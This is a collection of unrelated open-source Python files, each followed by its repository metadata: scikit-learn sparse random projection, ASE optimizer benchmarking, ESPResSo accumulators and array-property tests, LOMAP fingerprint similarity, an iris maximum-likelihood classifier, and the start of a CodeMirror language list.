components : numpy array or CSR matrix [n_components, n_features]
The generated random matrix.
"""
random_state = check_random_state(self.random_state)
return gaussian_random_matrix(n_components,
n_features,
random_state=random_state)
class SparseRandomProjection(BaseRandomProjection):
"""Reduce dimensionality through sparse random projection
    A sparse random matrix is an alternative to a dense random
    projection matrix; it guarantees similar embedding quality while being
much more memory efficient and allowing faster computation of the
projected data.
If we note `s = 1 / density` the components of the random matrix are
drawn from:
- -sqrt(s) / sqrt(n_components) with probability 1 / 2s
- 0 with probability 1 - 1 / s
- +sqrt(s) / sqrt(n_components) with probability 1 / 2s
Read more in the :ref:`User Guide <sparse_random_matrix>`.
Parameters
----------
n_components : int or 'auto', optional (default = 'auto')
Dimensionality of the target projection space.
n_components can be automatically adjusted according to the
number of samples in the dataset and the bound given by the
Johnson-Lindenstrauss lemma. In that case the quality of the
embedding is controlled by the ``eps`` parameter.
        It should be noted that the Johnson-Lindenstrauss lemma can yield
        very conservative estimates of the required number of components
        as it makes no assumptions on the structure of the dataset.
density : float in range ]0, 1], optional (default='auto')
Ratio of non-zero component in the random projection matrix.
If density = 'auto', the value is set to the minimum density
as recommended by Ping Li et al.: 1 / sqrt(n_features).
Use density = 1 / 3.0 if you want to reproduce the results from
Achlioptas, 2001.
eps : strictly positive float, optional, (default=0.1)
Parameter to control the quality of the embedding according to
the Johnson-Lindenstrauss lemma when n_components is set to
'auto'.
Smaller values lead to better embedding and higher number of
dimensions (n_components) in the target projection space.
dense_output : boolean, optional (default=False)
If True, ensure that the output of the random projection is a
dense numpy array even if the input and random projection matrix
are both sparse. In practice, if the number of components is
small the number of zero components in the projected data will
be very small and it will be more CPU and memory efficient to
use a dense representation.
If False, the projected data uses a sparse representation if
the input is sparse.
random_state : int, RandomState instance or None, optional (default=None)
Control the pseudo random number generator used to generate the matrix
at fit time. If int, random_state is the seed used by the random
number generator; If RandomState instance, random_state is the random
number generator; If None, the random number generator is the
RandomState instance used by `np.random`.
Attributes
----------
    n_components_ : int
Concrete number of components computed when n_components="auto".
components_ : CSR matrix with shape [n_components, n_features]
Random matrix used for the projection.
density_ : float in range 0.0 - 1.0
        Concrete density computed when density = "auto".
See Also
--------
GaussianRandomProjection
References
----------
.. [1] Ping Li, T. Hastie and K. W. Church, 2006,
"Very Sparse Random Projections".
http://web.stanford.edu/~hastie/Papers/Ping/KDD06_rp.pdf
.. [2] D. Achlioptas, 2001, "Database-friendly random projections",
https://users.soe.ucsc.edu/~optas/papers/jl.pdf
"""
def __init__(self, n_components='auto', density='auto', eps=0.1,
dense_output=False, random_state=None):
super(SparseRandomProjection, self).__init__(
n_components=n_components,
eps=eps,
dense_output=dense_output,
random_state=random_state)
self.density = density
def _make_random_matrix(self, n_components, n_features):
""" Generate the random projection matrix
Parameters
----------
n_components : int,
Dimensionality of the target projection space.
n_features : int,
Dimensionality of the original source space.
Returns
-------
components : numpy array or CSR matrix [n_components, n_features]
The generated random matrix.
"""
random_state = check_random_state(self.random_state)
self.density_ = _check_density(self.density, n_features)
return sparse_random_matrix(n_components,
n_features,
density=self.density_,
random_state=random_state)
|
RomainBrault/scikit-learn
|
sklearn/random_projection.py
|
Python
|
bsd-3-clause
| 22,969
|
[
"Gaussian"
] |
7ce7dda6b9f7e3f3194cac6d6d966fb23a6e148123250ecd06a64561b2408854
|
"""Define a helper function for running tests
The skeleton for making a new setup is as follows:
from ase.optimize.test import run_test
def get_atoms():
return Atoms('H')
def get_calculator():
return EMT()
run_test(get_atoms, get_calculator, 'Hydrogen')
"""
import time
import matplotlib
matplotlib.rcParams['backend'] = "Agg"
from ase.optimize.bfgs import BFGS
from ase.optimize.lbfgs import LBFGS, LBFGSLineSearch
from ase.optimize.fire import FIRE
from ase.optimize.mdmin import MDMin
from ase.optimize.sciopt import SciPyFminCG
from ase.optimize.sciopt import SciPyFminBFGS
from ase.optimize.bfgslinesearch import BFGSLineSearch
from ase.optimize.oldqn import GoodOldQuasiNewton
from ase.parallel import rank, paropen
import matplotlib.pyplot as pl
import numpy as np
import traceback
optimizers = [
'BFGS',
'LBFGS',
'LBFGSLineSearch',
'FIRE',
'MDMin',
'SciPyFminCG',
'SciPyFminBFGS',
'BFGSLineSearch',
'GoodOldQuasiNewton'
]
def get_optimizer(optimizer):
if optimizer == 'BFGS': return BFGS
elif optimizer == 'LBFGS': return LBFGS
elif optimizer == 'LBFGSLineSearch': return LBFGSLineSearch
elif optimizer == 'FIRE': return FIRE
elif optimizer == 'MDMin': return MDMin
elif optimizer == 'SciPyFminCG': return SciPyFminCG
elif optimizer == 'SciPyFminBFGS': return SciPyFminBFGS
elif optimizer == 'BFGSLineSearch': return BFGSLineSearch
elif optimizer == 'GoodOldQuasiNewton': return GoodOldQuasiNewton
def run_test(get_atoms, get_calculator, name,
fmax=0.05, steps=100, plot=True):
plotter = Plotter(name, fmax)
csvwriter = CSVWriter(name)
# write header
row = ['Optimizer', 'Optimizer Steps', 'Force evaluations', 'Energy']
row.extend(['Time [sec]', 'Note'])
format = '%s,%s,%s,%s,%s,%s\n'
csvwriter.write(row, format)
for optimizer in optimizers:
note = ''
logname = name + '-' + optimizer
atoms = get_atoms()
atoms.set_calculator(get_calculator())
opt = get_optimizer(optimizer)
relax = opt(atoms, logfile=None)
#logfile = logname + '.log',
#trajectory = logname + '.traj')
obs = DataObserver(atoms)
relax.attach(obs)
t = time.time()
try:
            relax.run(fmax=fmax, steps=steps)
E = atoms.get_potential_energy()
if relax.get_number_of_steps() == steps:
note = 'Not converged in %i steps' % steps
except Exception:
traceback.print_exc()
note = 'An exception occurred'
E = np.nan
t = time.time() - t
nsteps = relax.get_number_of_steps()
if hasattr(relax, 'force_calls'):
fc = relax.force_calls
if rank == 0:
                print('%-15s %-15s %3i %8.3f (%3i) %s' % (name, optimizer, nsteps, E, fc, note))
else:
fc = nsteps
if rank == 0:
                print('%-15s %-15s %3i %8.3f %s' % (name, optimizer, nsteps, E, note))
plotter.plot(optimizer, obs.get_E(), obs.get_fmax())
format = '%s,%i,%i,%.5f,%i,%s\n'
row = [optimizer, nsteps, fc, E]
row.extend([int(t), note])
csvwriter.write(row, format)
plotter.save()
csvwriter.finalize()
class Plotter:
def __init__(self, name, fmax):
self.name = name
self.fmax = fmax
if rank == 0:
self.fig = pl.figure(figsize=[12.0, 9.0])
self.axes0 = self.fig.add_subplot(2, 1, 1)
self.axes1 = self.fig.add_subplot(2, 1, 2)
def plot(self, optimizer, E, fmax):
if rank == 0:
            self.axes0.plot(E, label=optimizer)
self.axes1.plot(fmax)
def save(self, format='png'):
if rank == 0:
self.axes0.legend()
self.axes0.set_title(self.name)
self.axes0.set_ylabel('E [eV]')
#self.axes0.set_yscale('log')
self.axes1.set_xlabel('steps')
self.axes1.set_ylabel('fmax [eV/A]')
self.axes1.set_yscale('log')
self.axes1.axhline(self.fmax, color='k', linestyle='--')
self.fig.savefig(self.name + '.' + format)
class CSVWriter:
def __init__(self, name):
self.f = paropen(name + '.csv', 'w')
def write(self, row, format):
self.f.write(format % tuple(row))
def finalize(self):
self.f.close()
class DataObserver:
def __init__(self, atoms):
self.atoms = atoms
self.E = []
self.fmax = []
def __call__(self):
self.E.append(self.atoms.get_potential_energy())
self.fmax.append(np.sqrt((self.atoms.get_forces()**2).sum(axis=1)).max())
def get_E(self):
return np.array(self.E)
def get_fmax(self):
return np.array(self.fmax)
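# Editor's sketch (hypothetical, mirroring the skeleton in the module
# docstring): compare all optimizers on an H2 molecule with the EMT
# calculator.
#
#   from ase import Atoms
#   from ase.calculators.emt import EMT
#   from ase.optimize.test import run_test
#
#   def get_atoms():
#       return Atoms('H2', positions=[(0, 0, 0), (0, 0, 0.8)])
#
#   def get_calculator():
#       return EMT()
#
#   run_test(get_atoms, get_calculator, 'H2')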
|
conwayje/ase-python
|
ase/optimize/test/__init__.py
|
Python
|
gpl-2.0
| 4,860
|
[
"ASE"
] |
a6903138ae8b50d7025767e471f95e54f6b849472507937ae6744e1ea7c2e8f9
|
from __future__ import print_function, absolute_import
from .script_interface import ScriptInterfaceHelper, script_interface_register
import numpy as np
@script_interface_register
class MeanVarianceCalculator(ScriptInterfaceHelper):
"""
Accumulates results from observables.
Parameters
----------
obs : Instance of :class:`espressomd.observables.Observable`.
delta_N : :obj:`int`
Number of timesteps between subsequent samples for the auto update mechanism.
Methods
-------
update
Update the accumulator (get the current values from the observable).
get_mean
        Returns the sample mean of the observable with which the
        accumulator was initialized.
    get_variance
        Returns the sample variance of the observable.
"""
_so_name = "Accumulators::MeanVarianceCalculator"
_so_bind_methods = (
"update",
"get_mean",
"get_variance"
)
_so_creation_policy = "LOCAL"
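# Editor's sketch (illustrative; assumes an espressomd `system` with at least
# one particle and an integrator set up): track the running mean and variance
# of a particle's velocity.
#
#   from espressomd.observables import ParticleVelocities
#   from espressomd.accumulators import MeanVarianceCalculator
#   vel = ParticleVelocities(ids=(0,))
#   acc = MeanVarianceCalculator(obs=vel, delta_N=10)
#   system.auto_update_accumulators.add(acc)
#   system.integrator.run(1000)
#   print(acc.get_mean(), acc.get_variance())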
@script_interface_register
class Correlator(ScriptInterfaceHelper):
"""
Calculates correlations based on results from observables.
Parameters
----------
obs1, obs2 : Instances of :class:`espressomd.observables.Observable`.
The observables A and B that are to be correlated. If `obs2`
is omitted, autocorrelation of `obs1` is calculated by
default.
corr_operation : :obj:`str`
The operation that is performed on :math:`A(t)` and
:math:`B(t+\\tau)` to obtain :math:`C(\\tau)`. The
following operations are currently available:
* `scalar_product`: Scalar product of :math:`A` and
              :math:`B`, i.e., :math:`C=\\sum\\limits_{i} A_i B_i`
* `componentwise_product`: Componentwise product of
:math:`A` and :math:`B`, i.e., :math:`C_i = A_i B_i`
* `square_distance_componentwise`: Each component of
the correlation vector is the square of the difference
between the corresponding components of the
              observables, i.e., :math:`C_i = (A_i-B_i)^2`. Example:
when :math:`A` is `ParticlePositions`, it produces the
mean square displacement (for each component
separately).
* `tensor_product`: Tensor product of :math:`A` and
:math:`B`, i.e., :math:`C_{i \\cdot l_B + j} = A_i B_j`
with :math:`l_B` the length of :math:`B`.
* `complex_conjugate_product`: assuming that the observables
consist of a complex and real part
:math:`A=(A_x+iA_y)`, and :math:`B=(B_x+iB_y)`, this
operation computes the result :math:`C=(C_x+iC_y)`,
as:
.. math::
C_x = A_xB_x + A_yB_y\\\\
C_y = A_yB_x - A_xB_y
* `fcs_acf`:
Fluorescence Correlation Spectroscopy (FCS)
autocorrelation function, i.e.,
.. math::
G_i(\\tau) =
\\frac{1}{N} \\left< \\exp \\left(
- \\frac{\\Delta x_i^2(\\tau)}{w_x^2}
- \\frac{\\Delta y_i^2(\\tau)}{w_y^2}
- \\frac{\\Delta z_i^2(\\tau)}{w_z^2}
\\right) \\right>
where
.. math::
\\Delta x_i^2(\\tau) = \\left( x_i(0) - x_i(\\tau) \\right)^2
is the square displacement of particle
:math:`i` in the :math:`x` direction, and :math:`w_x`
is the beam waist of the intensity profile of the
exciting laser beam,
.. math::
W(x,y,z) = I_0 \\exp
\\left( - \\frac{2x^2}{w_x^2} - \\frac{2y^2}{w_y^2} -
\\frac{2z^2}{w_z^2} \\right).
The values of :math:`w_x`, :math:`w_y`, and :math:`w_z`
              are passed to the correlator as `args`.
The above equations are a
generalization of the formula presented by Hoefling
              et al. :cite:`hofling11a`. For more information, see
references therein. Per each 3 dimensions of the
observable, one dimension of the correlation output
is produced. If `fcs_acf` is used with other
observables than `ParticlePositions`, the physical
meaning of the result is unclear.
delta_N : :obj:`int`
Number of timesteps between subsequent samples for the auto update mechanism.
tau_max : :obj:`float`
        This is the maximum value of :math:`\\tau` for which the
        correlation should be computed. Warning: Unless you are using
        the multiple tau correlator, choosing a `tau_max` of more than
        100 `dt` will result in a huge computational overhead. In a
        multiple tau correlator with reasonable parameters, `tau_max`
        can span the entire simulation without too much additional CPU
time.
tau_lin : :obj:`int`
The number of data-points for which the results are linearly spaced
in `tau`. This is a parameter of the multiple tau correlator. If you
want to use it, make sure that you know how it works. By default, it
is set equal to `tau_max` which results in the trivial linear
correlator. By setting `tau_lin` < `tau_max` the multiple
tau correlator is switched on. In many cases, `tau_lin`=16 is a
good choice but this may strongly depend on the observables you are
correlating. For more information, we recommend to read
Ref. :cite:`ramirez10a` or to perform your own tests.
compress1 and compress2 : :obj:`str`
These functions are used to compress the data when
going to the next level of the multiple tau
correlator. This is done by producing one value out of two.
The following compression functions are available:
* `discard2`: (default value) discard the second value from the time series, use the first value as the result
* `discard1`: discard the first value from the time series, use the second value as the result
* `linear`: make a linear combination (average) of the two values
If only `compress1` is specified, then
the same compression function is used for both
observables. If both `compress1` and `compress2` are specified,
then `compress1` is used for `obs1` and `compress2` for `obs2`.
Both `discard1` and `discard2` are safe for all
observables but produce poor statistics in the
tail. For some observables, `linear` compression
can be used which makes an average of two
neighboring values but produces systematic
errors. Depending on the observable, the
systematic error using the `linear` compression
can be anything between harmless and disastrous.
For more information, we recommend to read Ref.
:cite:`ramirez10a` or to perform your own tests.
args: :obj:`float[3]`
Three floats which are passed as arguments to the
correlation function. Currently it is only used by
fcs_acf. Other correlation operations will ignore these
values.
"""
_so_name = "Accumulators::Correlator"
_so_bind_methods = (
"update",
"finalize")
_so_creation_policy = "LOCAL"
def result(self):
res = np.array(self.call_method("get_correlation"))
return res.reshape((self.n_result, 2 + self.dim_corr))
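# Editor's sketch (illustrative; same assumptions as above): a per-component
# mean square displacement via the multiple tau correlator.
#
#   from espressomd.observables import ParticlePositions
#   pos = ParticlePositions(ids=(0,))
#   corr = Correlator(obs1=pos, corr_operation="square_distance_componentwise",
#                     delta_N=1, tau_max=10.0, tau_lin=16, compress1="discard1")
#   system.auto_update_accumulators.add(corr)
#   system.integrator.run(10000)
#   corr.finalize()
#   msd = corr.result()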
@script_interface_register
class AutoUpdateAccumulators(ScriptInterfaceHelper):
"""
Class for handling auto-update of Accumulators used by
:class:`espressomd.System`.
"""
_so_name = "Accumulators::AutoUpdateAccumulators"
_so_creation_policy = "LOCAL"
def add(self, Accumulator):
"""
        Adds an Accumulator instance to the auto-update list of the system.
"""
self.call_method("add", object=Accumulator)
def remove(self, Accumulator):
"""
        Removes an accumulator from the auto-update list.
"""
self.call_method("remove", object=Accumulator)
|
KonradBreitsprecher/espresso
|
src/python/espressomd/accumulators.py
|
Python
|
gpl-3.0
| 9,736
|
[
"exciting"
] |
b5e8484d3c3ef30006a61ad7bb6c1dd22b4643ce21f07a6b499fc9299da87036
|
#******************
# MODULE DOCSTRING
#******************
"""
LOMAP: fingerprint calculations
=====
Alchemical free energy calculations hold increasing promise as an aid to drug
discovery efforts. However, applications of these techniques in discovery
projects have been relatively few, partly because of the difficulty of planning
and setting up calculations. The Lead Optimization Mapper (LOMAP) is an
automated algorithm to plan efficient relative free energy calculations between
potential ligands within a substantial set of compounds.
"""
#*****************************************************************************
# Lomap2: A toolkit to plan alchemical relative binding affinity calculations
# Copyright 2015 - 2016 UC Irvine and the Authors
#
# Authors: Dr Gaetano Calabro' and Dr David Mobley
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, see http://www.gnu.org/licenses/
#*****************************************************************************
#****************
# MODULE IMPORTS
#****************
from rdkit import Chem
from rdkit.Chem import rdFMCS
from rdkit.Chem import AllChem
from rdkit.Chem.Draw.MolDrawing import DrawingOptions
from rdkit.Chem import Draw
from rdkit import DataStructs
from rdkit.Chem.Fingerprints import FingerprintMols
import sys
import math
from rdkit import RDLogger
import logging
import argparse
#*******************************
# Figureprint Class
#*******************************
__all__ = ['Figureprint']
class Figureprint(object):
"""
    This class is used to compute a fingerprint-based (Tanimoto) similarity
    between two RDKit molecule objects
"""
    def __init__(self, moli, molj, options):
"""
        Initialization function
Parameters
----------
moli : RDKit molecule object
the first molecule used to perform the Figureprint calculation
molj : RDKit molecule object
the second molecule used to perform the Figureprint calculation
options : argparse python object
the list of user options
"""
# Set logging level and format
logging.basicConfig(format='%(levelname)s:\t%(message)s', level=logging.INFO)
# Local pointers to the passed molecules
self.moli = moli
self.molj = molj
if not options.verbose == 'pedantic':
lg = RDLogger.logger()
lg.setLevel(RDLogger.CRITICAL)
self.fps_moli = FingerprintMols.FingerprintMol(self.moli)
self.fps_molj = FingerprintMols.FingerprintMol(self.molj)
self.fps_tan = DataStructs.FingerprintSimilarity(self.fps_moli, self.fps_molj)
def get_fps_tan(self):
return self.fps_tan
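# Editor's sketch (illustrative, not part of the original module): minimal
# usage with two hypothetical molecules; `opts` stands in for the argparse
# options object expected by Figureprint.
if __name__ == '__main__':
    moli = Chem.MolFromSmiles('CCO')   # ethanol
    molj = Chem.MolFromSmiles('CCCO')  # 1-propanol
    opts = argparse.Namespace(verbose='info')
    fp = Figureprint(moli, molj, opts)
    print('Tanimoto similarity: %.3f' % fp.get_fps_tan())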
|
nividic/Lomap
|
lomap/fp.py
|
Python
|
lgpl-2.1
| 3,370
|
[
"RDKit"
] |
a51135b2923edf7306a5fa3654e777775fb1fe8d62cbc0b6215c46636c5b5f05
|
# Copyright (C) 2010-2019 The ESPResSo project
#
# This file is part of ESPResSo.
#
# ESPResSo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ESPResSo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import unittest as ut
import numpy as np
import espressomd
import espressomd.lb
import espressomd.utils
import unittest_decorators as utx
class ArrayCommon(ut.TestCase):
def assert_operator_usage_raises(self, array):
with self.assertRaises(ValueError):
array[0] = 0
with self.assertRaises(ValueError):
array += [1, 1, 1]
with self.assertRaises(ValueError):
array -= [1, 1, 1]
with self.assertRaises(ValueError):
array *= [1, 1, 1]
with self.assertRaises(ValueError):
array /= [1, 1, 1]
with self.assertRaises(ValueError):
array //= [1, 1, 1]
with self.assertRaises(ValueError):
array %= [1, 1, 1]
with self.assertRaises(ValueError):
array **= [1, 1, 1]
with self.assertRaises(ValueError):
array <<= [1, 1, 1]
with self.assertRaises(ValueError):
array >>= [1, 1, 1]
with self.assertRaises(ValueError):
array &= [1, 1, 1]
with self.assertRaises(ValueError):
array |= [1, 1, 1]
with self.assertRaises(ValueError):
array ^= [1, 1, 1]
class ArrayLockedTest(ArrayCommon):
def test_locked_operators(self):
array = espressomd.utils.array_locked([1., 2., 3.])
self.assert_operator_usage_raises(array)
def test_unlocked_operators(self):
array = espressomd.utils.array_locked([1, 2, 3])
array2 = espressomd.utils.array_locked([4, 5, 6])
add = array + array2
sub = array - array2
self.assertIsInstance(add, np.ndarray)
self.assertIsInstance(sub, np.ndarray)
self.assertTrue(add.flags.writeable)
self.assertTrue(sub.flags.writeable)
np.testing.assert_array_equal(
add, np.add(np.copy(array), np.copy(array2)))
np.testing.assert_array_equal(
sub, np.subtract(
np.copy(array), np.copy(array2)))
np.testing.assert_array_equal(sub, -(array2 - array))
def test_copy_is_writeable(self):
array = np.copy(espressomd.utils.array_locked([1, 2, 3]))
self.assertTrue(array.flags.writeable)
def test_setter(self):
array = espressomd.utils.array_locked([1, 2, 3])
array = [4, 5, 6]
np.testing.assert_array_equal(array, [4, 5, 6])
def check_array_writable(array):
value = np.random.random(array.shape[0]).astype(type(array[0]))
array = value
np.testing.assert_array_almost_equal(np.copy(array), value)
class ArrayPropertyTest(ArrayCommon):
system = espressomd.System(box_l=[1.0, 1.0, 1.0])
system.box_l = [12.0, 12.0, 12.0]
system.time_step = 0.01
system.cell_system.skin = 0.01
system.part.add(pos=[0, 0, 0])
def setUp(self):
self.system.box_l = [12.0, 12.0, 12.0]
def tearDown(self):
self.system.actors.clear()
def assert_copy_is_writable(self, array):
cpy = np.copy(array)
self.assertTrue(cpy.flags.writeable)
def test_common(self):
self.assert_operator_usage_raises(self.system.part[0].pos)
self.assert_operator_usage_raises(self.system.part[0].v)
self.assert_operator_usage_raises(self.system.part[0].f)
self.assert_operator_usage_raises(self.system.part[0].pos_folded)
self.assert_operator_usage_raises(self.system.box_l)
check_array_writable(self.system.part[0].pos)
check_array_writable(self.system.part[0].v)
check_array_writable(self.system.part[0].f)
check_array_writable(self.system.box_l)
self.assert_copy_is_writable(self.system.part[0].pos)
self.assert_copy_is_writable(self.system.part[0].v)
self.assert_copy_is_writable(self.system.part[0].f)
self.assert_copy_is_writable(self.system.part[0].pos_folded)
self.assert_copy_is_writable(self.system.box_l)
@utx.skipIfMissingFeatures(["ROTATION"])
def test_rotation(self):
self.assert_operator_usage_raises(self.system.part[0].omega_lab)
self.assert_operator_usage_raises(self.system.part[0].quat)
self.assert_operator_usage_raises(self.system.part[0].rotation)
self.assert_operator_usage_raises(self.system.part[0].omega_body)
self.assert_operator_usage_raises(self.system.part[0].torque_lab)
if espressomd.has_features("EXTERNAL_FORCES"):
self.assert_operator_usage_raises(self.system.part[0].ext_torque)
check_array_writable(self.system.part[0].quat)
check_array_writable(self.system.part[0].omega_lab)
check_array_writable(self.system.part[0].rotation)
check_array_writable(self.system.part[0].omega_body)
check_array_writable(self.system.part[0].torque_lab)
if espressomd.has_features("EXTERNAL_FORCES"):
check_array_writable(self.system.part[0].ext_torque)
self.assert_copy_is_writable(self.system.part[0].omega_lab)
self.assert_copy_is_writable(self.system.part[0].quat)
self.assert_copy_is_writable(self.system.part[0].rotation)
self.assert_copy_is_writable(self.system.part[0].omega_body)
self.assert_copy_is_writable(self.system.part[0].torque_lab)
if espressomd.has_features("EXTERNAL_FORCES"):
self.assert_copy_is_writable(self.system.part[0].ext_torque)
@utx.skipIfMissingFeatures(["ROTATIONAL_INERTIA"])
def test_rotational_inertia(self):
self.assert_operator_usage_raises(self.system.part[0].rinertia)
check_array_writable(self.system.part[0].rinertia)
self.assert_copy_is_writable(self.system.part[0].rinertia)
@utx.skipIfMissingFeatures(["EXTERNAL_FORCES"])
def test_external_forces(self):
self.assert_operator_usage_raises(self.system.part[0].ext_force)
self.assert_operator_usage_raises(self.system.part[0].fix)
check_array_writable(self.system.part[0].ext_force)
check_array_writable(self.system.part[0].fix)
self.assert_copy_is_writable(self.system.part[0].ext_force)
self.assert_copy_is_writable(self.system.part[0].fix)
@utx.skipIfMissingFeatures(["ROTATION", "PARTICLE_ANISOTROPY"])
def test_rot_aniso(self):
self.assert_operator_usage_raises(self.system.part[0].gamma_rot)
check_array_writable(self.system.part[0].gamma_rot)
self.assert_copy_is_writable(self.system.part[0].gamma_rot)
def test_lb(self):
lbf = espressomd.lb.LBFluid(agrid=0.5, dens=1, visc=1, tau=0.01)
self.system.actors.add(lbf)
self.assert_operator_usage_raises(lbf[0, 0, 0].velocity)
self.assert_operator_usage_raises(lbf[0, 0, 0].pressure_tensor)
self.assert_operator_usage_raises(lbf[0, 0, 0].pressure_tensor_neq)
self.assert_operator_usage_raises(lbf[0, 0, 0].population)
@utx.skipIfMissingFeatures(["LANGEVIN_PER_PARTICLE",
"PARTICLE_ANISOTROPY"])
def test_langevinpp_aniso(self):
self.assert_operator_usage_raises(self.system.part[0].gamma)
check_array_writable(self.system.part[0].gamma)
self.assert_copy_is_writable(self.system.part[0].gamma)
@utx.skipIfMissingFeatures(["DIPOLES"])
def test_dipoles(self):
self.assert_operator_usage_raises(self.system.part[0].dip)
check_array_writable(self.system.part[0].dip)
self.assert_copy_is_writable(self.system.part[0].dip)
@utx.skipIfMissingFeatures(["EXCLUSIONS"])
def test_exclusions(self):
self.assert_operator_usage_raises(self.system.part[0].exclusions)
def test_partial_periodic(self):
self.assert_operator_usage_raises(self.system.periodicity)
check_array_writable(self.system.periodicity)
self.assert_copy_is_writable(self.system.periodicity)
if __name__ == "__main__":
ut.main()
|
KaiSzuttor/espresso
|
testsuite/python/array_properties.py
|
Python
|
gpl-3.0
| 8,586
|
[
"ESPResSo"
] |
0eb5f562603dbdd3ce4036b9b2998e095401602d195504f9b4ce64333629024e
|
__author__ = 'Mario'
import numpy as np
from scipy.stats import multivariate_normal as norm
import pandas as pd
import matplotlib.pyplot as plt
dataTraining = pd.read_table('./Data/iris_training.txt',delim_whitespace=True, header=None)
dataTest = pd.read_table('./Data/iris_test.txt',delim_whitespace=True, header=None)
#
# dataTraining = pd.read_table('./Data/wine_uci_train.txt',delim_whitespace=True, header=None)
# dataTest = pd.read_table('./Data/wine_uci_test.txt',delim_whitespace=True, header=None)
n = len(dataTraining)
nClassifiers = len(dataTraining.loc[0])
nTypesIris = 3
def readIrisTraining():
pass
# print dataIris[:3]
# print "this is: ", dataIris[0]
# print n
def gaussian(x, mu, cov):
# cov = np.cov([dataIris[dataIris[0]==1][1],dataIris[dataIris[0]==1][2]],
# dataIris[dataIris[0]==1][3],dataIris[dataIris[0]==1][4])
# print cov
# sigma1 = np.average(sigma)
# x = np.linspace(-4*sigma1,4*sigma1,4)
normPDF = norm.pdf(x,mu,cov)
return normPDF
def estimatedParameters(xArray):
mu = []
sigma = []
for i in range(1,nClassifiers):
mu.append(xArray[i].mean())
        sigma.append((1.0 / len(xArray)) * np.sum((xArray[i] - mu[i - 1])**2))
return mu, sigma
readIrisTraining()
parametersMu = []
parametersSigma = []
parametersCov = []
indexTable = dataTraining[dataTraining[0]]
for i in range(1,nTypesIris+1):
mu, sigma = estimatedParameters(dataTraining[dataTraining[0]==i])
parametersMu.append(mu)
parametersSigma.append(sigma)
    # Collect each feature column for class i; rows of np.cov are treated as
    # variables, yielding the feature-by-feature covariance matrix.
    covList = []
    for j in range(1, nClassifiers):
        covList.append(dataTraining[dataTraining[0] == i][j])
    cov = np.cov(np.array(covList))
    parametersCov.append(cov)
parametersLen = len(parametersMu)
SuccessList = []
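# Maximum-likelihood decision rule: assign each test point to the class
# whose fitted Gaussian N(x; mu_k, Sigma_k) has the highest density at x.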
for i in range(0, len(dataTest)):
tempXMaximum = 0
maxDistribution = 0
x = dataTest.loc[i]
for j in range(0,parametersLen):
tempX = (gaussian(x[1:], parametersMu[j], parametersCov[j]))
if tempX > tempXMaximum:
tempXMaximum = tempX
maxDistribution = j
if dataTest[0][i] == maxDistribution+1:
SuccessList.append(1)
else:
SuccessList.append(0)
# print(SuccessList)
print(np.average(SuccessList))
# np.cov([dataIris[dataIris[0]==1][1],dataIris[dataIris[0]==1][2],dataIris[dataIris[0]==1][3],dataIris[dataIris[0]==1][4]])
|
marioharper182/Patterns
|
PatternRecognition/ProgrammingProject1/MaxLiklihood.py
|
Python
|
apache-2.0
| 2,560
|
[
"Gaussian"
] |
768c204e9c2f00ae95bb5bac8816156348c5e3a7e4af07d32bac8471425b1f38
|
# This file is generated by mk-codemirror-language-list.py.
# Probably don't edit it by hand.
# List of (mode_name, human_label, js_url)
CODEMIRROR_MODES = [
('apl', 'APL', '/static/codemirror/mode/apl/apl.js'),
('asn.1', 'ASN.1', '/static/codemirror/mode/asn.1/asn.1.js'),
('clike', 'C, C++, C#', '/static/codemirror/mode/clike/clike.js'),
('clike', 'Ceylon', '/static/codemirror/mode/clike/clike.js'),
('clike', 'Java', '/static/codemirror/mode/clike/clike.js'),
('clike', 'Kotlin', '/static/codemirror/mode/clike/clike.js'),
('clike', 'Objective C', '/static/codemirror/mode/clike/clike.js'),
('clike', 'Squirrel', '/static/codemirror/mode/clike/clike.js'),
('clojure', 'Clojure', '/static/codemirror/mode/clojure/clojure.js'),
('cmake', 'CMake', '/static/codemirror/mode/cmake/cmake.js'),
('cobol', 'COBOL', '/static/codemirror/mode/cobol/cobol.js'),
('coffeescript', 'CoffeeScript', '/static/codemirror/mode/coffeescript/coffeescript.js'),
('commonlisp', 'Common Lisp', '/static/codemirror/mode/commonlisp/commonlisp.js'),
('crystal', 'Crystal', '/static/codemirror/mode/crystal/crystal.js'),
('css', 'CSS', '/static/codemirror/mode/css/css.js'),
('cypher', 'Cypher', '/static/codemirror/mode/cypher/cypher.js'),
('d', 'D', '/static/codemirror/mode/d/d.js'),
('dart', 'Dart', '/static/codemirror/mode/dart/dart.js'),
('diff', 'diff', '/static/codemirror/mode/diff/diff.js'),
('django', 'Django template', '/static/codemirror/mode/django/django.js'),
('dockerfile', 'Dockerfile', '/static/codemirror/mode/dockerfile/dockerfile.js'),
('dtd', 'DTD', '/static/codemirror/mode/dtd/dtd.js'),
('dylan', 'Dylan', '/static/codemirror/mode/dylan/dylan.js'),
('ebnf', 'EBNF', '/static/codemirror/mode/ebnf/ebnf.js'),
('ecl', 'ECL', '/static/codemirror/mode/ecl/ecl.js'),
('eiffel', 'Eiffel', '/static/codemirror/mode/eiffel/eiffel.js'),
('elm', 'Elm', '/static/codemirror/mode/elm/elm.js'),
('erlang', 'Erlang', '/static/codemirror/mode/erlang/erlang.js'),
('factor', 'Factor', '/static/codemirror/mode/factor/factor.js'),
('fcl', 'FCL', '/static/codemirror/mode/fcl/fcl.js'),
('forth', 'Forth', '/static/codemirror/mode/forth/forth.js'),
('fortran', 'Fortran', '/static/codemirror/mode/fortran/fortran.js'),
('gas', 'Gas', '/static/codemirror/mode/gas/gas.js'),
('gfm', 'Markdown, GitHub-flavour', '/static/codemirror/mode/gfm/gfm.js'),
('gherkin', 'Gherkin', '/static/codemirror/mode/gherkin/gherkin.js'),
('go', 'Go', '/static/codemirror/mode/go/go.js'),
('groovy', 'Groovy', '/static/codemirror/mode/groovy/groovy.js'),
